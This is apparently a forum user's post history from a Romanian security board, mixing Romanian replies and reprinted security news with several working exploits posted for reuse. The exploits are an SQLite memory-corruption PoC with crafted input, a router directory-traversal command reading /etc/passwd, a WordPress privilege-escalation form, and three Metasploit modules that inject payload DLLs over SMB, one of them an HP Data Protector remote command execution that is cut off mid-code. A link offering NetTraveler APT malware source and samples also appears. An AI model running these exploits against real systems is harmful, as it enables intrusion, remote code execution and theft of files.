Aerosol

Sfat:// poate citesti si tu inainte sa postezi. uTorrentul nu e de vina ca tu dai Next, Next, Next fara sa citesti, foarte multe programe fac asta si foarte multe programe te ANUNTA dar tu cum esti "grabit" sa il instalezi nu citest Termenii & Conditiile, sau orice ar scrie inainte sa dai next. -Daca 100000 de oamenii folosesc programu asta inseamna ca nu am de ce sa verific, ii dau next, next, next si ce-o fi, o fi.

https://rstforums.com/forum/98250-hp-data-protector-8-10-remote-command-execution.rst A mai fost postat, oricum e bine ca te implici. Sfat: Cand postezi ceva ce nu iti apartine posteaza si sursa. E vorba ca a mai fost postata nu ca ma intreci

Usor, usor o dau toti pe chestii de genul. ( noroc ca nu folosesc )

# Exploit Title: SQLite3 controlled memory corruption PoC (0day) # Date: [date] # Exploit Author: Andras Kabai # Vendor Homepage: http://www.sqlite.org/ # Software Link: http://www.sqlite.org/download.html # Version: 3.8.6, 3.8.8.3 # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code) Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker. The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source. ==== andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3 /usr/bin/sqlite3 andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version 3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done. (gdb) set disassembly-flavor intel (gdb) set args < sqlitepoc.txt (gdb) r Starting program: /usr/bin/sqlite3 < sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb590 140737488336272 rdx 0x0 0 rsi 0x555555779b43 93824994483011 rdi 0x41414141424242 18367622009733698 rbp 0x555555779b43 0x555555779b43 rsp 0x7fffffffb4c0 0x7fffffffb4c0 r8 0x555555779b41 93824994483009 r9 0x6c 108 r10 0x0 0 r11 0x0 0 r12 0x555555779b48 93824994483016 r13 0x7fffffffb590 140737488336272 r14 0x555555779b40 93824994483008 r15 0x2 2 rip 0x7ffff7ba06a0 0x7ffff7ba06a0 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa: => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7ba06a3 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7ba06a6 <sqlite3_load_extension+742>: lea rax,[rip+0x12bc1] # 0x7ffff7bb326e End of assembler dump. === andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version 3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./lt-sqlite3...done. (gdb) set disassembly-flavor intel (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt (gdb) r Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169 36169 } (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb510 140737488336144 rdx 0x0 0 rsi 0x6261c3 6447555 rdi 0x41414141424242 18367622009733698 rbp 0x6261c3 0x6261c3 rsp 0x7fffffffb440 0x7fffffffb440 r8 0x6261c1 6447553 r9 0x6c 108 r10 0x7fffffffb270 140737488335472 r11 0x7ffff7b5ae50 140737349267024 r12 0x6261c8 6447560 r13 0x7fffffffb510 140737488336144 r14 0x6261c0 6447552 r15 0x2 2 rip 0x7ffff7b5b130 0x7ffff7b5b130 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a: => 0x00007ffff7b5b130 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7b5b133 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7b5b136 <sqlite3_load_extension+742>: lea rax,[rip+0x587d8] # 0x7ffff7bb3915 End of assembler dump. ==== andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt 00000000 3b 0a 2e 74 20 78 0a 2e 74 0a 77 68 61 74 65 76 |;..t x..t.whatev| 00000010 65 72 00 0a 3b 0a 2e 74 0a 2e 6f 70 0a 2e 6c 20 |er..;..t..op..l | 00000020 43 43 43 43 42 42 42 42 41 41 41 41 0a |CCCCBBBBAAAA.| 0000002d Source

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) # Date : 2015-03-01 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests. The vulnerability may be tested with the following command-line: curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd Or directly from navigateur: http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp Source

Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program announced today and launched last month operates through HackerOne used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure, and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieters Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first in for reporting a flaw and offer Adobe "reasonable" time to fix the flaws prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded: Logout and other instances of low-severity cross-site request forgery Perceived issues with password reset links Missing http security headers Missing cookie flags on non-sensitive cookies Clickjacking on static pages The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published July he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends bounties should be published in an obvious location on websites, preferably located with the /security subdomain, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source

France's spy agency has been fingered as the likely author of complex reconnaissance malware, researchers say. The Casper malware is one of a handful with links to the Babar spy program which leaked NSA documents revealed last month to be the handiwork of France's Direction Générale de la Sécurité Extérieure (General Directorate for External Security or DGSE). Barbar emerged in 2009 and has since been used to steal keystrokes, clipboards and listen in on Skype conversations among other feats of interception. ESET malware analyst Joan Calvet says in a report on Casper it appears to have recently been used in April 2014 actions against Syrian targets. "To attack their targets, Casper’s operators used zero-day exploits in Adobe Flash, and these exploits were – surprisingly – hosted on a Syrian governmental website," Calvet says. "Casper is a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines." "These targets may have been the visitors of the jpic.gov.sy website — Syrian citizens who want to file a complaint. In this case they could have been redirected to the exploits from a legitimate page of this website." The Syrian website may have been used as a means to store Casper's binaries and command and control componentry while concealing and misdirecting the identity of attackers. Casper, analysed in a joint effort between malware researchers Marion Marschalek of Cyphort, Paul Rascagnères of GData, and security bods from the Computer Incident Response Center Luxembourg, could not be definitively pinned on France according to the technical analysis. Bit Calvet was able to obtain Casper samples through ESET's malware network and found it matched with the same Flash exploits Kaspersky researcher Vyacheslav Zakorzhevsky reported was used on the site last April. Caper is notable in its identification and evasion of specific versions for four anti-virus platforms including BitDefender, PC Tools, and Avast which it identified on a target's Windows machine using the Windows Management Instrumentation facility. Calvet says this suggests authors have "in-depth knowledge" of the way those anti-virus products work. The malware flees a target machine if a product is detected or injects code into a new process if it is found vulnerable, and receives instruction data with a now offline command and control server including the ability to deploy additional plugins. The research team found its payloads were very similar to those under the DGSE's project researchers dub Animal Farm under which Babar and the Bunny and NBOT malware were developed. "None of these signs alone is enough to establish a strong link but all the shared features together make us assess with high confidence that Bunny, Babar, NBOT and Casper were all developed by the same organisation," Calvet says. Kasperksy malware boffin Costin Raiu who indecently analysed Casper told Motherboard the advanced Animal Farm hacking operation was likely the work of a nation state given the absence of financial gain. “When you have such a large-scale operation going on for several years using multiple zero-days without any kind of financial outcome,” Raiu says. "It’s obvious that it’s nation-state sponsored — it has to be.” Source

Ma omule ceea ce zici tu e irelevant ( hai sa nu mai arestam criminalii ca mna, omoara 1 om 2/3/100 si se opreste, nu? ) Incearca sa gandesti logic, e ceva ilegal ( + tepari nu-s tolerati pe aici. ), cu asta am zis tot. Off:// ce treaba are rep-ul cu asta?

# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation # Date: 24-11-2014 # Software Link: https://wordpress.org/plugins/download-manager/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9260 1. Description Every registered user can update every WordPress options using basic_settings() function. function basic_settings() { if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') { foreach ($_POST as $optn => $optv) { update_option($optn, $optv); } if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form'); die('Settings Saved Successfully'); } include('settings/basic.php'); } http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html 2. Proof of Concept Login as standard user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings"> <input type="hidden" name="task" value="wdm_save_settings"> <input type="hidden" name="section" value="basic"> <input type="hidden" name="default_role" value="administrator"> <input type="submit" value="Hack!"> </form> After that create new user using wp-login.php?action=register. Newly created user will have admin privileges. 3. Solution: Update to version 2.7.3 Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection', 'Description' => %q{ The Nvidia Mental Ray Satellite Service listens for control commands on port 7414. When it receives the command to load a DLL (via an UNC path) it will try to connect back to the host on port 7514. If a TCP connection is successful it will then attempt to load the DLL. This module has been tested successfully on Win7 x64 with Nvidia Mental Ray Satellite Service v3.11.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Discovery 'Donato Ferrante', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'References' => [ [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'win', 'Targets' => [ [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ] ], 'Privileged' => true, 'DisclosureDate' => 'Dec 10 2013', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(7414), OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("Trying to execute remote DLL...") send_exploit end def setup super # These lengths are required, although we specify the UNC path # length in the exploit, the header probably has another length # value we don't adjust. self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end def send_exploit # No idea what most of this hello is... hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7" hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000" hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000" hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f" hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000" hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000" hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000" hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009" hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000" hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000" hello << "0000000030000000a000000" hello = Rex::Text.hex_to_raw(hello) # Start of command - again no idea what this is... load_dll = Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013") # Length of path string including null byte load_dll << [unc.length + 1].pack('V') # Data type? load_dll << [2].pack('V') # Assembly Load? load_dll << "AL" load_dll << unc << "\x00" # Some padding at the end... load_dll << rand_text_alpha(1386 - unc.length) # We have to start a second listening port although we dont actually care about # handling client connections. It appears as long as the service can make a # connection its happy and will move onto the DLL loading create_listen_port vprint_status("Connecting to target and sending commands") connect sock.put(hello) sock.put(load_dll) print_status("Instructed the service to load #{unc}...") end def create_listen_port port = datastore['LISTEN_PORT'] comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end @listener = Rex::Socket::TcpServer.create( 'LocalHost' => datastore['SRVHOST'], 'LocalPort' => port, 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) # Register callbacks @listener.on_client_connect_proc = proc { |cli| add_socket(cli) begin print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...") ensure # Need to close the socket for the SMB request to be # initiated... remove_socket(cli) end } @listener.start vprint_status("Started listening on TCP port #{port}") end def cleanup super return unless @listener begin @listener.deref if @listener.is_a?(Rex::Service) if @listener.is_a?(Rex::Socket) @listener.close @listener.stop end @listener = nil rescue ::Exception end end end Source

Fura 10$ de la tine, 10$ de la el, 10$ de la x,y,z si asa face banii! ( ce mentalitate poti sa ai. ) Citeste putin regulamentul. ( NU SE DAU TEPE )

La multi ani nenea.

Google Code project: https://code.google.com/p/open-nettraveler/ Git Command: git clone https://code.google.com/p/open-nettraveler/ Kaspersky reports: http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf “NetTraveler is Running!” – Red Star APT Attacks Compromise High-Profile Victims - Securelist NetTraveler is back with new tricks | Kaspersky Lab Malware samples: Download More about CVE-2012-0158: https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/ More about CVE-2010-3333: Targeted attacks against recently addressed Microsoft Office vulnerability (CVE-2010-3333/MS10-087) - Microsoft Malware Protection Center - Site Home - TechNet Blogs Good luck! All Link Download : http://pastebin.com/BM0X1i04 Source

Recent revelations that Uber stored a sensitive database key on a publicly accessible GitHub page generated its share of amazement and outrage. Some Ars readers called for the immediate termination of the employees responsible or for the enactment of new legal penalties for similar blunders in the future. Left out of the discussion was a point Ars first tried to drive home more than two years ago. To wit, GitHub and other public code repositories are awash with personal credentials posted by tens of thousands, or possibly even millions, of people, some of whom work for extremely sensitive organizations. A case in point are GitHub entries that appear to include everything needed to log into many Secure File Transfer Protocol accounts. One GitHub search revealed almost 269,000 entries like the one pictured above, showing the domain name or IP address, username, and password needed to log in to each account. Similar searches generated almost two million entries for WordPress accounts. A quick scan of the results shows that many of them represent no security threat at all, since the password fields are blank or the credentials belong to non-existent accounts or accounts that are accessible only to users already connected to the local network. But a mind-numbingly large percentage of the results appear to provide credentials for accounts on production servers. Whether percentage is 33, 25, or even 10, it's way too high. It wouldn't be surprising if many of the credentials offered shell accounts that ran with highly privileged administrator rights. To protect the careless, this post won't reveal the specific search terms used, even though they are extremely easy for readers figure out on their own or to find on Twitter, in blog posts, or in other venues. As Ars has reported before, malicious hackers are increasingly favoring Web servers as the target of choice since they offer more computing power and bandwidth compared to more traditionally targeted Windows-based desktops and laptops. Besides increased firepower for waging denial of service attacks, servers often can be used as beachheads to further penetrate company networks. It's hard to imagine criminals aren't already employing automated scripts that regularly trawl GitHub for credentials that can be used for this purpose. Who needs spear phishing and software or Web exploits when the login details are sitting in plain sight? For obvious legal reasons, Ars didn't test this hypothesis, but Uber's recent admission in court documents suggests it's by no means far-fetched. If a digital key unlocking a database storing driver license numbers of 50,000 Uber drivers can remain on GitHub for six months—as the subpoena Uber filed against GitHub stronly implied—there's no telling what other credentials belonging to other companies are being similarly siphoned up. Readers who are tempted to scoff at Uber's epic blunder have reason to do so. But let's not forget that the ride-sharing service is hardly alone, and this critical mass of carelessness makes the Internet less safe for everyone. Source

Google and Firefox have upgraded their flagship browsers, crushing bugs and cracking down on bad certificates along the way. The Choc Factory's Chrome 41 swats 51 bugs of which at least 13 are classified as high severity and six considered medium risks. Google engineer Penny MacNeil thanked security researchers for the effort to identify the bugs. "We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel," MacNeil says. Here's this month's ameliorated messes: [$7500][456516] High CVE-2015-1212: Out-of-bounds write in media. Credit to anonymous. [$5000][448423] High CVE-2015-1213: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$5000][445810] High CVE-2015-1214: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$5000][445809] High CVE-2015-1215: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$4000][454954] High CVE-2015-1216: Use-after-free in v8 bindings. Credit to anonymous. [$3000][456192] High CVE-2015-1217: Type confusion in v8 bindings. Credit to anonymous. [$3000][456059] High CVE-2015-1218: Use-after-free in dom. Credit to cloudfuzzer. [$3000][446164] High CVE-2015-1219: Integer overflow in webgl. Credit to Chen Zhang (demi6od) of NSFOCUS Security Team. [$3000][437651] High CVE-2015-1220: Use-after-free in gif decoder. Credit to Aki Helin of OUSPG. [$2500][455368] High CVE-2015-1221: Use-after-free in web databases. Credit to Collin Payne. [$2500][448082] High CVE-2015-1222: Use-after-free in service workers. Credit to Collin Payne. [$2000][454231] High CVE-2015-1223: Use-after-free in dom. Credit to Maksymillian Motyl. [449610] High CVE-2015-1230: Type confusion in v8. Credit to Skylined working with HP’s Zero Day Initiative. [$2000][449958] Medium CVE-2015-1224: Out-of-bounds read in vpxdecoder. Credit to Aki Helin of OUSPG. [$1000][446033] Medium CVE-2015-1225: Out-of-bounds read in pdfium. Credit to cloudfuzzer. [$1000][456841] Medium CVE-2015-1226: Validation issue in debugger. Credit to Rob Wu. [$1000][450389] Medium CVE-2015-1227: Uninitialized value in blink. Credit to Christoph Diehl. [$1000][444707] Medium CVE-2015-1228: Uninitialized value in rendering. Credit to miaubiz. [$500][431504] Medium CVE-2015-1229: Cookie injection via proxies. Credit to iliwoy. Mozilla's updates Firefox version 37 include a revocation feature to bolster the killing of bad intermediate certificates. The OneCRL replaces the Online Certificate Status Protocol which is less effective because it relies on third parties to keep updated registries of their valid and revoked certificates. Certificates were often accepted as soft-fails when the status could not be determined due to some technical or connectivity failure. Mozilla's new list operates in the browser and is populated by issuers who push certificate status instead of the browser having to do the fetching. This block-list, already used for blacklisting bad plugins and drivers, will now speed up checking times because it avoids the need for Mozilla to push out updates that require browser restarts, Mozilla security boffin Mark Goodwin says. "OneCRL helps speed up revocation checking by maintaining a centralised list of revoked certificates and pushing it out to browsers. Currently, if a serious incident occurs that requires certificates to be revoked, we release an update to Firefox to address the problem. "This is slow because it takes some time for users to get the security update and restart their browsers. There’s also cost involved in producing an update and in users downloading it." Goodwin points to a blog by Google guy Adam Langley who said last year that the old revocation checking did little to improve security. OneCRL for now covers intermediate certificates to reduce the size of Mozilla's blocklist and will be later sped up by automating the collection of revoked certificates. Source

Feature "It is far more common to find routers with critical flaws than without" - Craig Young "It's sad that end-user education about strong passwords, password safes, and phishing can be undone by something as innocuous as the blinking box in the corner of your room. - Peter Adkins Introduction Home and small business router security is terrible. Exploits emerge with depressing regularity, exposing millions of users to criminal activities. Many of the holes are so simple as to be embarrassing. Hard-coded credentials are so common in small home and office routers, comparatively to other tech kit, that only those with tin-foil hats bother to suggest the flaws are deliberate. Hacker gang Lizard Squad crystallised the dangers – and opportunities – presented by router vulnerabilities when over the Christmas break they crafted a slick paid denial of service stresser service that operated on hacked boxes. Customers were found paying to flood targets of choice with gigabits of bandwidth stolen from what the black hats claimed were a fleet of half a million vulnerable and subsequently hacked routers. A year earlier, security boffins at Team Cymru warned that an unknown ganghad popped 300,000 routers in a week, altering the DNS settings to point to malicious web entities. Those routers were hacked through a self-propagating worm (PDF) that researchers had already warned about, but not yet seen. It used a mix of brute force password guessing of web admin consoles, cross-site request forgery, and known un-patched vulnerabilities. Arguably the most infamous hack in recent months was Check Point's so-called Misfortune Cookie discovered in December 2014. This vulnerability was thought to impact a staggering 12 million routers across 200 models from big names such as Linksys, D-Link, TP-Link, ZTE, and Huawei. Affected routers could be hijacked with a crafted cookie that allows attackers to meddle with just about everything on the units, from password theft, to alterations to DNS, and infection of connected devices. In October Rapid7 had chipped in with its own research, warning that Network Address Translation Port Mapping Protocol configurations in 1.2 million routers was sufficiently borked that remote attackers could spy on internal traffic. Security is 'abysmal' "Router security remains abysmal, especially among the cheapest brands,” says John Matherly, founder of the popular Shodan search engine which crawls for internet-connected devices. “Backdoors, no automated patching and default usernames and passwords are just a few of the problems that many SOHO routers continue to face.” Matherly last month dug up an estimated 250,000 routers used in Spain that were using the same SSH keys, placing those configured a for remote access at heighten risk. He also points to research published two days later by Entrust Solutions hacker Nabin Kc, who found 200,000 home routers contained a firmware backdoor, a flaw replicated across 10 different vendors who seemed to be re-branding a vanilla router. Matherly says badge-engineering seems a common practise for vendors that compete on price over form or function. “It seems that the rate of security problems discovered with routers is only limited by the number of security experts that take the time to analyse the devices,” he says. Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic DLL Injection From Shared Resource', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a DLL can be loaded from an specified SMB share. This module serves payloads as DLLs over an SMB service. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'References' => [ ['CWE', '114'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)']) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and 